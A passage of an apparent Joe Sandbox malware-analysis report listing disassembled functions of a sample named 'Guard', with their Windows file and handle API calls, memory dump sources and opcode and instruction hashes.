                                                                                          • Opcode Fuzzy Hash: 7c32f71168fe0e9ade4fdd998d62a0e253a4b49bb776caafa0db7a874ca125e7
                                                                                          • Instruction Fuzzy Hash: C4B09234000602569D282F3C294849A3301584ABA97D81B89E578854F29A398C4BA720
                                                                                          Function 00A8C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00A84005: FindFirstFileW.KERNEL32(?,?), ref: 00A8407C
                                                                                            • Part of subcall function 00A84005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00A840CC
                                                                                            • Part of subcall function 00A84005: FindNextFileW.KERNEL32(00000000,00000010), ref: 00A840DD
                                                                                            • Part of subcall function 00A84005: FindClose.KERNEL32(00000000), ref: 00A840F4
                                                                                          • GetLastError.KERNEL32 ref: 00A8C292
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                          • String ID:
                                                                                          • API String ID: 2191629493-0
                                                                                          • Opcode ID: e2dd198599f4417189defe3116f9fda91c027acac3d3934c42daf3a238f4dda4
                                                                                          • Instruction ID: 5a96b651edb71c02f2e8b2fca83844b2003c6ead1d0fe4d04fab178b9517e2a6
                                                                                          • Opcode Fuzzy Hash: e2dd198599f4417189defe3116f9fda91c027acac3d3934c42daf3a238f4dda4
                                                                                          • Instruction Fuzzy Hash: E7F08C322106108FCB10FF99E944F6AB7E5AF88360F058019F94A8B352CB74BC02CB94
                                                                                          Function 00A342CF Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00A62F8B), ref: 00A342EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 40efddf6695443cc0e57385d215659278946378d9b4baf50b2a089b46e51da6c
                                                                                          • Instruction ID: 12243bd4e115a492f908aca8839ee29a28b9d275b49c27e4784e0feacfaf3f0c
                                                                                          • Opcode Fuzzy Hash: 40efddf6695443cc0e57385d215659278946378d9b4baf50b2a089b46e51da6c
                                                                                          • Instruction Fuzzy Hash: 37E09275400B01CFC3314F5AE804452FBF8FFE53613214A2EE4E6A2660D3B0689A8F90